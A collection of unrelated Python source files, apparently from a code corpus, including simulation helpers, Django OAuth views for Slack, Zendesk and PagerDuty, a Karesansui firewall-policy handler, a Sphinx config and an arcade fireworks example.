df = pd.DataFrame.from_dict(records)
df = df.loc[:, [
'sid', 'k', 'alpha', 'b', 'p_rewire',
'A', 'k_avg', 'clustering', 'assortativity', 'average_path_length',
'degseq_type', 'degseq_sort',
'isolates', 'labels', 'directed',
'degseq', 'deg_skew', 'deg_kurt',
]]
return df
def simulate(space, dparams, drep, sdaparams, sdarep, simparams,
n_jobs=4, simfunc=run_sda, **kwds):
dpars = list(product(range(1, drep+1), product(*dparams)))
def _func(idx, dpar, sdaparams, sdarep):
gc.collect()
X, labels = simulate_space(space, *dpar)
df = simfunc(X, labels, sdaparams, sdarep, simparams, **kwds)
df.insert(0, 'did', idx)
df.insert(2, 'centers', dpar[2])
df.insert(2, 'm', dpar[1])
df.insert(2, 'N', dpar[0])
df.insert(2, 'space', space)
# Remove unneseccary network objects
df.loc[df['did'] != 1, 'A'] = None
return df
results = Parallel(n_jobs=n_jobs)(
delayed(_func)(idx, dpar, sdaparams, sdarep) for idx, dpar in tqdm(dpars)
)
df = None
for _df in results:
if _df is None:
continue
if df is None:
df = _df
else:
df = pd.concat((df, _df), ignore_index=True)
return df
# Postprocessing functions ----------------------------------------------------
def am_to_text(A):
if A is None:
return None
return '|'.join(map('-'.join, A.toarray().astype(str)))
def degseq_to_text(degseq):
if degseq is None:
return None
return '|'.join(degseq.astype(str))
|
py | b40b508be4a1ffd8a9281c2493395ba5d51fee58 |
print("Shaping data array...")
with open('sample.txt', 'r') as ip:
raw = ip.read()
contents = raw.replace('\n', ' ')
contents = contents.strip()
aslist = contents.split(' ')
def is_number(s):
try:
int(s)
return True
except ValueError:
return False
aslist = [k for k in aslist if is_number(k)]
with open('fractaloutput.txt', 'w') as op:
for i in range(0, len(aslist)):
if (i % 3) == 0:
op.write('[')
op.write(aslist[i])
if ((i + 1) % 3) == 0:
op.write('] ')
else:
op.write(' ')
if ((i + 1) % 768) == 0 and i != 0:
op.write('\n')
print("Data arranged")
|
py | b40b50ddc66c55ebdb8163f2ed8b7c0d3c71de3b | # -*- coding: utf-8 -*-
# @Author : Ecohnoch(xcy)
# @File : configs.py
# @Function : TODO
app_redis_hostname = 'my_redis'
app_redis_port = 6379
app_info_key = 'INFO_KEY'
app_response_key = 'RESPONSE_KEY'
app_error_key = 'ERROR_KEY'
app_kafka_host = 'my_kafka:9092'
app_kafka_topic = 'user_queue'
app_kafka_key = 'user_requests'
app_group_id = 'calculator'
app_web_host = 'http://face_storage:12350'
app_file_interface = '/get_image_file'
call_interval = 1
sleep_interval = 7 |
py | b40b51896d00920faadbb7ad14cc7d11920d0e6d | # Copyright (c) IBM Corp. 2018. All Rights Reserved.
# Project name: Constrained Exploration and Recovery from Experience Shaping
# This project is licensed under the MIT License, see LICENSE
import os
from ceres.tools.io.h5_helper import save_dict_as_h5, load_dict_from_h5
class ConstraintConfig(object):
'''
Constraint network configuration with save and restore functions
'''
valid_param = ['mlp_hidden_layers',
'n_ineq',
'loss_weights',
'spherical_coordinates',
'normalize_ineq_mat',
'predict_interior_point',
'interior_point_margin_min',
'interior_point_margin_max',
'interior_point_max']
cnet_config_filename = 'cnet_config.h5'
def __init__(self, **kwargs):
self.set_default()
self.set(**kwargs)
def set_default(self):
self.spherical_coordinates = False
self.normalize_ineq_mat = False
self.predict_interior_point = False
self.interior_point_margin_min = 0.
self.interior_point_margin_max = 0.
self.interior_point_max = 0.
self.loss_weights = {}
def set(self, **kwargs):
for key, value in kwargs.items():
assert key in self.valid_param, 'Invalid parameter type {0}'.format(key)
setattr(self, key, value)
def save(self, path_save):
d = self.__dict__
assert os.path.isdir(path_save), 'Config save function only takes a directory as input'
path_save = os.path.join(path_save, self.cnet_config_filename)
save_dict_as_h5(d, path_save, verbose=True)
@classmethod
def from_backup(cls, path_save):
if os.path.isdir(path_save):
path_cnet_dir = path_save
else:
path_cnet_dir = os.path.dirname(path_save)
path_cnet_config = os.path.join(path_cnet_dir, cls.cnet_config_filename)
d = load_dict_from_h5(path_cnet_config, verbose=False)
cnet_config = cls(**d)
return cnet_config
@classmethod
def from_extra_args(cls, args):
cnet_config = cls(mlp_hidden_layers=args.cnet_hidden_layers,
n_ineq=args.cnet_n_ineq,
loss_weights=args.cnet_loss_weights,
spherical_coordinates=args.cnet_spherical_coordinates,
normalize_ineq_mat=args.cnet_normalize_ineq_mat,
predict_interior_point=args.cnet_predict_interior_point,
interior_point_margin_min=args.cnet_interior_point_margin_min,
interior_point_margin_max=args.cnet_interior_point_margin_max,
interior_point_max=args.cnet_interior_point_max,
)
return cnet_config
|
py | b40b523df9f80d2d40850459fee8186d1716a1aa | import time
from playscii import GameObject, GameManager
from playscii.input import Input
class JumpManager(GameManager):
def __init__(self):
super().__init__((100, 6))
self.dino = MODIDino()
self.obstacle = Obstacle(self)
self.game_over = False
self.status = ""
self.score = 0
self.scoreboard = GameObject(pos=(50, 5), render='0')
def setup(self):
self.add_object(self.dino)
self.add_object(self.obstacle)
self.add_object(self.scoreboard)
def update(self):
if Input.get_key_down('q'):
self.quit()
self.scoreboard.render = str(self.score)
if self.game_over:
self.set_title("Game Over!!")
time.sleep(3)
self.game_over = False
self.score = 0
self.obstacle.speed = 30
self.obstacle.x = 160
self.set_title(self.status)
if 0 < self.obstacle.x - self.dino.x < 4 and self.dino.y < 3:
self.dino.vel = 0
self.obstacle.speed = 0
self.game_over = True
class MODIDino(GameObject):
def __init__(self):
super().__init__(pos=(10, 0), render='MODI', size=(4, 1))
self.touch_ground = True
self.vel = 0
def update(self):
if Input.get_key_down('space'):
if self.touch_ground:
self.vel = 15
self.touch_ground = False
if not self.touch_ground:
self.y += self.vel * self.delta_time
self.vel -= 20 * self.delta_time
if self.y < 0:
self.y = 0
self.touch_ground = True
class Obstacle(GameObject):
def __init__(self, parent):
super().__init__(pos=(100, 2), render='D\nD\nD', size=(1, 3))
self.speed = 30
self.manager = parent
def update(self):
self.x -= self.speed * self.delta_time
if self.x < 0:
self.x = 100
self.manager.score += 1
self.speed += 1
if __name__ == '__main__':
JumpManager().start()
|
py | b40b52a8a5e832fa03f1ce4493e8d9dd3f851e69 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lintjenkins documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import lintjenkins
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'lintjenkins'
copyright = u"2017, westdoorblowcola"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = lintjenkins.__version__
# The full version, including alpha/beta/rc tags.
release = lintjenkins.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'lintjenkinsdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'lintjenkins.tex',
u'lintjenkins Documentation',
u'westdoorblowcola', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'lintjenkins',
u'lintjenkins Documentation',
[u'westdoorblowcola'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'lintjenkins',
u'lintjenkins Documentation',
u'westdoorblowcola',
'lintjenkins',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
py | b40b52db76767373a14f5d418a7b998094ee5021 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Externalvirtual(Package):
homepage = "http://somewhere.com"
url = "http://somewhere.com/stuff-1.0.tar.gz"
version('1.0', '1234567890abcdef1234567890abcdef')
version('2.0', '234567890abcdef1234567890abcdef1')
version('2.1', '34567890abcdef1234567890abcdef12')
version('2.2', '4567890abcdef1234567890abcdef123')
provides('stuff', when='@1.0:')
|
py | b40b5314289cf4e77422f902a6f015d06fcb6a5a | # -*- coding: utf-8 -*-
#
# This file is part of Karesansui.
#
# Copyright (C) 2009-2012 HDE, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import os
import time
import web
from web.utils import Storage
from karesansui.lib.rest import Rest, auth
from karesansui.lib.firewall.iptables import KaresansuiIpTables
from karesansui.lib.checker import Checker, \
CHECK_EMPTY, CHECK_VALID, CHECK_LENGTH, CHECK_CHAR
from karesansui.lib.utils import is_param
def validates_policy(obj):
checker = Checker()
check = True
_ = obj._
checker.errors = []
if not is_param(obj.input, 'input_policy'):
check = False
checker.add_error(_('"%s" is required.') % _('INPUT Chain'))
else:
check = checker.check_firewall_policy(
_('INPUT Chain'),
obj.input.input_policy,
CHECK_EMPTY | CHECK_VALID
) and check
if not is_param(obj.input, 'output_policy'):
check = False
checker.add_error(_('"%s" is required.') % _('OUTPUT Chain'))
else:
check = checker.check_firewall_policy(
_('OUTPUT Chain'),
obj.input.output_policy,
CHECK_EMPTY | CHECK_VALID
) and check
if not is_param(obj.input, 'forward_policy'):
check = False
checker.add_error(_('"%s" is required.') % _('FORWARD Chain'))
else:
check = checker.check_firewall_policy(
_('FORWARD Chain'),
obj.input.input_policy,
CHECK_EMPTY | CHECK_VALID
) and check
obj.view.alert = checker.errors
return check
class HostBy1FirewallPolicy(Rest):
@auth
def _GET(self, *param, **params):
host_id = self.chk_hostby1(param)
if host_id is None: return web.notfound()
self.view.host_id = host_id
kit = KaresansuiIpTables()
if os.path.exists(kit.firewall_xml_file) is False:
self.view.have_config = False
else:
self.view.have_config = True
kit.firewall_xml = kit.read_firewall_xml()
for chain in kit.basic_chains['filter']:
try:
policy = kit.firewall_xml['filter'][chain]['policy']
except:
policy = 'ACCEPT'
chain = chain.lower()
exec("self.view.%s_policy_ACCEPT_checked = ''" % chain)
exec("self.view.%s_policy_DROP_checked = ''" % chain)
exec("self.view.%s_policy_REJECT_checked = ''" % chain)
if policy == 'REJECT':
exec("self.view.%s_policy = 'REJECT'" % chain)
exec("self.view.%s_policy_REJECT_checked = 'checked'" % chain)
elif policy == 'DROP':
exec("self.view.%s_policy = 'DROP'" % chain)
exec("self.view.%s_policy_DROP_checked = 'checked'" % chain)
self.view.base_policy_DROP_checked = 'checked';
else:
exec("self.view.%s_policy = 'ACCEPT'" % chain)
exec("self.view.%s_policy_ACCEPT_checked = 'checked'" % chain)
self.view.iptables = Storage(
is_running=kit.is_running(),
is_configured=kit.is_configured(),
)
self.view.targets = kit.basic_targets['filter']
return True
@auth
def _PUT(self, *param, **params):
host_id = self.chk_hostby1(param)
if host_id is None: return web.notfound()
kit = KaresansuiIpTables()
kit.firewall_xml = kit.read_firewall_xml()
if not validates_policy(self):
self.logger.debug("Create account is failed, Invalid input value")
return web.badrequest(self.view.alert)
kit.modify_policy("INPUT", self.input.input_policy)
kit.modify_policy("OUTPUT", self.input.output_policy)
kit.modify_policy("FORWARD",self.input.forward_policy)
kit.write_firewall_xml()
for chain in kit.basic_chains['filter']:
try:
policy = kit.firewall_xml['filter'][chain]['policy']
except:
policy = 'ACCEPT'
chain = chain.lower()
exec("self.view.%s_policy_ACCEPT_checked = ''" % chain)
exec("self.view.%s_policy_DROP_checked = ''" % chain)
exec("self.view.%s_policy_REJECT_checked = ''" % chain)
if policy == 'REJECT':
exec("self.view.%s_policy = 'REJECT'" % chain)
exec("self.view.%s_policy_REJECT_checked = 'checked'" % chain)
elif policy == 'DROP':
exec("self.view.%s_policy = 'DROP'" % chain)
exec("self.view.%s_policy_DROP_checked = 'checked'" % chain)
self.view.base_policy_DROP_checked = 'checked';
else:
exec("self.view.%s_policy = 'ACCEPT'" % chain)
exec("self.view.%s_policy_ACCEPT_checked = 'checked'" % chain)
return web.seeother(web.ctx.path)
urls = ('/host/(\d+)/firewall/policy/?(\.part)$', HostBy1FirewallPolicy,)
|
py | b40b541327d2328ab34edf894a64d7c5613d78fc | import pytz
import datetime
from django.utils.dateparse import parse_datetime
def utc_now():
return datetime.datetime.utcnow().replace(tzinfo=pytz.utc)
def get_valid_period(start_time=None, end_time=None):
"""
Extract a valid period.
If start_time and end_time are provided and no more than a day apart, return them.
If neither start_time nor end_time are given, return the previous 24 hour period, calculated from now.
If start_time is given, return 24 hour period starting from start time.
If end_time is given, return 24 hour period ending at end_time.
:param start_time:
:param end_time:
:return:
"""
if start_time and end_time:
if end_time <= start_time:
raise ValueError("end_time must be after start_time")
# Allow 1 day and 1 hour to not bother with more complicated logic for daylight savings time edge cases:
if start_time + datetime.timedelta(days=1, hours=1) < end_time:
raise ValueError("Difference between start_time and end_time must not be greater than one day")
return start_time, end_time
if start_time is None and end_time is None:
end_time = utc_now()
day = datetime.timedelta(days=1)
if start_time:
return start_time, start_time + day
else:
return end_time - day, end_time
|
py | b40b55a578c8d1cda44024c7784b11d5b5817e20 | from tartiflette_middleware import BaseMiddleware
class SQLAlchemySessionMiddleware(BaseMiddleware):
label = 'SA'
def __init__(self, *, db_manager):
BaseMiddleware.__init__(self)
self.db_manager = db_manager
async def __aenter__(self):
session = self.db_manager.get_scoped_session()
await self.store_request_data(session)
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
session = await self.get_request_data()
session.remove()
|
py | b40b5749b4b8c6bb63240829b7763cf32b820428 | import json
import pprint
import logging
import requests
from django.conf import settings
from django.template import loader
from django.http import HttpResponse
from rest_framework import status
from django.contrib import messages
from django.shortcuts import redirect
from rest_framework.response import Response
from django.contrib.auth.decorators import login_required
from webapp.celery import run_daily_summary
from zenslackchat.models import SlackApp
from zenslackchat.models import ZendeskApp
from zenslackchat.models import PagerDutyApp
def slack_oauth(request):
"""Complete the OAuth process recovering the details needed to access the
slack workspace we have just been added to.
"""
log = logging.getLogger(__name__)
if 'code' not in request.GET:
log.error("The code parameter was missing in the request!")
return Response(status=status.HTTP_400_BAD_REQUEST)
code = request.GET['code']
log.debug(f"Received Slack OAuth request code:<{code}>")
params = {
'code': code,
'client_id': settings.SLACK_CLIENT_ID,
'client_secret': settings.SLACK_CLIENT_SECRET
}
log.debug("Recovering access request from Slack...")
json_response = requests.get(settings.SLACK_OAUTH_URI, params)
log.debug(f"Result status from Slack:<{json_response.status_code}>")
if settings.DEBUG:
log.debug(f"Result from Slack:\n{json_response.text}")
data = json.loads(json_response.text)
SlackApp.objects.create(
team_name=data['team_name'],
team_id=data['team_id'],
bot_user_id=data['bot']['bot_user_id'],
bot_access_token=data['bot']['bot_access_token']
)
log.debug("Create local Team for this bot. Bot Added OK.")
return HttpResponse('Bot added to your Slack team!')
def zendesk_oauth(request):
"""Complete the Zendesk OAuth process recovering the access_token needed to
perform API requests to the Zendesk Support API.
"""
log = logging.getLogger(__name__)
if 'code' not in request.GET:
log.error("The code parameter was missing in the request!")
return Response(status=status.HTTP_400_BAD_REQUEST)
subdomain = settings.ZENDESK_SUBDOMAIN
request_url = f"https://{subdomain}.zendesk.com/oauth/tokens"
redirect_uri = settings.ZENDESK_REDIRECT_URI
code = request.GET['code']
log.debug(
f"Received Zendesk OAuth request code:<{code}>. "
f"Recovering access token from {request_url}. "
f"Redirect URL is {redirect_uri}. "
)
data = {
'code': code,
'client_id': settings.ZENDESK_CLIENT_IDENTIFIER,
'client_secret': settings.ZENDESK_CLIENT_SECRET,
'grant_type': 'authorization_code',
'redirect_uri': redirect_uri,
}
response = requests.post(
request_url,
data=json.dumps(data),
headers={"Content-Type": "application/json"}
)
log.debug(f"Result status from Zendesk:<{response.status_code}>")
response.raise_for_status()
data = response.json()
log.debug(f"Result status from Zendesk:\n{pprint.pformat(data)}>")
ZendeskApp.objects.create(
access_token=data['access_token'],
token_type=data['token_type'],
scope=data['scope'],
)
log.debug("Created local ZendeskApp instance OK.")
return HttpResponse('ZendeskApp Added OK')
def pagerduty_oauth(request):
"""Complete the Pager Duty OAuth process.
- https://developer.pagerduty.com/docs/app-integration-development/
oauth-2-auth-code-grant/
"""
log = logging.getLogger(__name__)
if 'code' not in request.GET:
log.error("The code parameter was missing in the request!")
return Response(status=status.HTTP_400_BAD_REQUEST)
code = request.GET['code']
subdomain = request.GET['subdomain']
log.debug(
f"Received Zendesk OAuth request code:<{code}> for subdomain:"
f"<{subdomain}>. Recovering access token."
)
response = requests.post(
(
f'{settings.PAGERDUTY_OAUTH_URI}?'
'grant_type=authorization_code&'
f'client_id={settings.PAGERDUTY_CLIENT_IDENTIFIER}&'
f'client_secret={settings.PAGERDUTY_CLIENT_SECRET}&'
f'redirect_uri={settings.PAGERDUTY_REDIRECT_URI}&'
f'code={code}'
)
)
log.debug(f"Result status from PagerDuty:<{response.status_code}>")
response.raise_for_status()
data = response.json()
if settings.DEBUG:
log.debug(f"Result status from PagerDuty:\n{pprint.pformat(data)}>")
PagerDutyApp.objects.create(
access_token=data['access_token'],
token_type=data['token_type'],
scope=data['scope'],
)
log.debug("Created local PagerDutyApp instance OK.")
return HttpResponse('PagerDutyApp Added OK')
@login_required
def trigger_daily_report(request):
"""Helper to trigger the daily report to aid in testing it works.
Otherwise you would need to connect into the running instance and do it
from the django shell.
"""
log = logging.getLogger(__name__)
log.info("Scheduling the daily report to run now...")
run_daily_summary.delay()
msg = "Daily report scheduled."
log.info(msg)
messages.success(request, msg)
return redirect('/')
# Restrict scope down to what I can interact with..
ZENDESK_REQUESTED_SCOPES = "%20".join((
# general read:
'read',
# allows me to be zenslackchat when managing tickets
'impersonate',
# I only need access to tickets resources:
'tickets:read', 'tickets:write',
))
@login_required
def index(request):
"""A page Pingdom can log-in to test site uptime and DB readiness.
"""
log = logging.getLogger(__name__)
template = loader.get_template('zenslackchat/index.html')
zendesk_oauth_request_uri = (
"https://"
f"{settings.ZENDESK_SUBDOMAIN}"
".zendesk.com/oauth/authorizations/new?"
f"response_type=code&"
f"redirect_uri={settings.ZENDESK_REDIRECT_URI}&"
f"client_id={settings.ZENDESK_CLIENT_IDENTIFIER}&"
f"scope={ZENDESK_REQUESTED_SCOPES}"
)
log.debug(f"zendesk_oauth_request_uri:<{zendesk_oauth_request_uri}>")
slack_oauth_request_uri = (
"https://slack.com/oauth/authorize?"
"scope=bot&"
f"client_id={settings.SLACK_CLIENT_ID}"
)
log.debug(f"slack_oauth_request_uri:<{slack_oauth_request_uri}>")
pagerduty_oauth_request_uri = (
'https://app.pagerduty.com/oauth/authorize?'
f'client_id={settings.PAGERDUTY_CLIENT_IDENTIFIER}&'
f'redirect_uri={settings.PAGERDUTY_REDIRECT_URI}&'
'response_type=code'
)
log.debug(f"pagerduty_oauth_request_uri:<{pagerduty_oauth_request_uri}>")
return HttpResponse(template.render(
dict(
zendesk_oauth_request_uri=zendesk_oauth_request_uri,
slack_oauth_request_uri=slack_oauth_request_uri,
pagerduty_oauth_request_uri=pagerduty_oauth_request_uri
),
request
))
|
py | b40b57b2374c8cc2d913fb08a8b17ea11e662c03 | # -*- coding: utf-8 -*-
import platform
import wget
import requests
import os
import pickle
from zipfile import ZipFile
from os.path import expanduser
def get_savedir(savedir=None):
if savedir:
os.makedirs(savedir, exist_ok=True)
return savedir
pf = platform.system()
if pf == "Windows":
savedir = "C:\word2word"
else:
homedir = expanduser("~")
savedir = os.path.join(homedir, ".word2word")
if not os.path.exists(savedir):
os.makedirs(savedir, exist_ok=True)
return savedir
def exists(path):
r = requests.head(path)
return r.status_code == requests.codes.ok
def get_download_url(lang1, lang2):
filepath = os.path.dirname(os.path.abspath(__file__)) + '/supporting_languages.txt'
for line in open(filepath, 'r'):
l1, l2 = line.strip().split("-")
if lang1 == l1 and lang2 == l2:
return f"https://mk.kakaocdn.net/dn/kakaobrain/word2word/{lang1}-{lang2}.pkl"
raise Exception(f"Language pair {lang1}-{lang2} is not supported.")
def download_or_load(lang1, lang2, custom_savedir):
savedir = get_savedir(savedir=custom_savedir)
fpath = os.path.join(savedir, f"{lang1}-{lang2}.pkl")
if not os.path.exists(fpath):
# download from cloud
url = get_download_url(lang1, lang2)
if url is None:
raise ValueError(f"Dataset not found for {lang1}-{lang2}.")
if not exists(url):
raise ValueError("Sorry. There seems to be a problem with cloud access.")
print("Downloading data ...")
wget.download(url, fpath)
word2x, y2word, x2ys = pickle.load(open(fpath, 'rb'))
return word2x, y2word, x2ys
def download_os2018(lang1, lang2):
"""Download corpora from OpenSubtitles2018.
:return (lang1_file, lang2_file)
"""
datadir = "data"
filepref = f"OpenSubtitles.{lang1}-{lang2}"
if all(os.path.exists(os.path.join(datadir, f"{filepref}.{lang}"))
for lang in [lang1, lang2]):
print(f"Found existing {filepref} files. loading...")
else:
# Download and unzip parallel corpus
url = f"http://opus.nlpl.eu/download.php?f=OpenSubtitles/v2018/moses/{lang1}-{lang2}.txt.zip"
zipname = os.path.join(datadir, f"{lang1}-{lang2}.txt.zip")
print(f"Downloading {filepref}...")
wget.download(url, zipname)
with ZipFile(zipname) as zf:
for fname in zf.namelist():
if fname.startswith(filepref):
zf.extract(fname, datadir)
os.remove(zipname)
lang1_file, lang2_file = [
os.path.abspath(os.path.join(datadir, f"{filepref}.{lang}"))
for lang in [lang1, lang2]
]
return lang1_file, lang2_file
|
py | b40b57bd1b70238f28cf4c6cd58265775b52e0c0 | """
Particle Fireworks
Use a fireworks display to demonstrate "real-world" uses of Emitters and Particles
If Python and Arcade are installed, this example can be run from the command line with:
python -m arcade.examples.sprite_list_particle_fireworks
"""
import arcade
from arcade import Point, Vector
from arcade.utils import _Vec2 # bring in "private" class
from arcade.examples.frametime_plotter import FrametimePlotter
import os
import random
import pyglet
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_TITLE = "Particle based fireworks"
LAUNCH_INTERVAL_MIN = 1.5
LAUNCH_INTERVAL_MAX = 2.5
TEXTURE = "images/pool_cue_ball.png"
RAINBOW_COLORS = (
arcade.color.ELECTRIC_CRIMSON,
arcade.color.FLUORESCENT_ORANGE,
arcade.color.ELECTRIC_YELLOW,
arcade.color.ELECTRIC_GREEN,
arcade.color.ELECTRIC_CYAN,
arcade.color.MEDIUM_ELECTRIC_BLUE,
arcade.color.ELECTRIC_INDIGO,
arcade.color.ELECTRIC_PURPLE,
)
SPARK_TEXTURES = [arcade.make_circle_texture(15, clr) for clr in RAINBOW_COLORS]
SPARK_PAIRS = [
[SPARK_TEXTURES[0], SPARK_TEXTURES[3]],
[SPARK_TEXTURES[1], SPARK_TEXTURES[5]],
[SPARK_TEXTURES[7], SPARK_TEXTURES[2]],
]
ROCKET_SMOKE_TEXTURE = arcade.make_soft_circle_texture(15, arcade.color.GRAY)
PUFF_TEXTURE = arcade.make_soft_circle_texture(80, (40, 40, 40))
FLASH_TEXTURE = arcade.make_soft_circle_texture(70, (128, 128, 90))
CLOUD_TEXTURES = [
arcade.make_soft_circle_texture(50, arcade.color.WHITE),
arcade.make_soft_circle_texture(50, arcade.color.LIGHT_GRAY),
arcade.make_soft_circle_texture(50, arcade.color.LIGHT_BLUE),
]
STAR_TEXTURES = [
arcade.make_soft_circle_texture(6, arcade.color.WHITE),
arcade.make_soft_circle_texture(6, arcade.color.PASTEL_YELLOW),
]
SPINNER_HEIGHT=75
def make_spinner():
spinner = arcade.Emitter(
center_xy=(SCREEN_WIDTH / 2, SPINNER_HEIGHT - 5),
emit_controller=arcade.EmitterIntervalWithTime(0.025, 2.0),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=random.choice(STAR_TEXTURES),
change_xy=(0, 6.0),
lifetime=0.2
)
)
spinner.change_angle = 16.28
return spinner
def make_rocket(emit_done_cb):
"""Emitter that displays the smoke trail as the firework shell climbs into the sky"""
rocket = RocketEmitter(
center_xy=(random.uniform(100, SCREEN_WIDTH - 100), 25),
emit_controller=arcade.EmitterIntervalWithTime(0.04, 2.0),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=ROCKET_SMOKE_TEXTURE,
change_xy=arcade.rand_in_circle((0.0, 0.0), 0.08),
scale=0.5,
lifetime=random.uniform(1.0, 1.5),
start_alpha=100,
end_alpha=0,
mutation_callback=rocket_smoke_mutator
),
emit_done_cb=emit_done_cb
)
rocket.change_x = random.uniform(-1.0, 1.0)
